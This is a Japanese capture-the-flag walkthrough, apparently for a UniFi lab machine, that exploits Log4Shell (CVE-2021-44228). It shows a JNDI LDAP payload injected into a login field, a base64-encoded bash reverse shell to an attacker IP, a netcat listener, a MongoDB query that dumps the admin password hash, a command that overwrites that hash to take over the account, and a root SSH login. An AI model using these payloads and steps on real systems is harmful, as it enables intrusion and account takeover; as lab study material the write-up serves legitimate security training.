db_nmap -sV 10.129.147.254
8080 がウェブサイトであることがわかりました。開く
10.129.147.254:8080
UniFi で検索:UniFi 脆弱性
関連する脆弱性が見つかりました:CVE-2021-44228
試してみます。。
389 ポートを監視
sudo tcpdump -i tun0 port 389
コマンドを実行
このコマンドを base64 で暗号化します
echo 'bash -c bash -i >& /dev/tcp/10.10.16.20/12123 0>&1' | base64
burpsuite のパケットキャプチャにこの内容を追加
{
"username":"admin",
"password":"admin",
"remember":"${jndi:ldap://10.10.16.20/test}",
"strict"
}
${jndi:ldap://Tun0 IP Address:1389/o=tomcat} 
sudo nc -lvnp 12123
ポートを監視
ここで send パケットを送信
シェルを取得
script /dev/null -c bash を使用
データベース情報を取得 mongo データベース
ps aux | grep mongo 
クエリを通じて、以下の情報を取得
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson)" 
"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
"name" : "administrator",
"email" : "[email protected]",
"x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",
パスワードが表示されます
sha-512 で暗号化されたパスワードを表示
mkpasswd -m sha-512 あなたが設定したパスワード
mongo --port 27117 ace --eval 'db.admin.update({"_id"("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"SHA-512 Hash Generated"}})'
変更前の Adminstrator の x_shadow 値:
"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
"name" : "administrator",
"email" : "[email protected]",
"x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",
変更後:
"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
"name" : "administrator",
"email" : "[email protected]",
"x_shadow" : "$6$N5j/rR78cHLEi42V$itMyy1nFi5HmeqfR9aV75vp2TXOnCIyN4zyVOW8NVlwU2H7QTqCA.aYuJY/svipLLCBsY9r5FE9eOFs9kjIHW/",
この時点で、Adminstrator のパスワードは test1234 に変更されました
左側の設定の一番下に、
sshKeys が見つかりました
ssh にログイン
アカウント:root
パスワード:NotACrackablePassword4U2022
シェルを取得
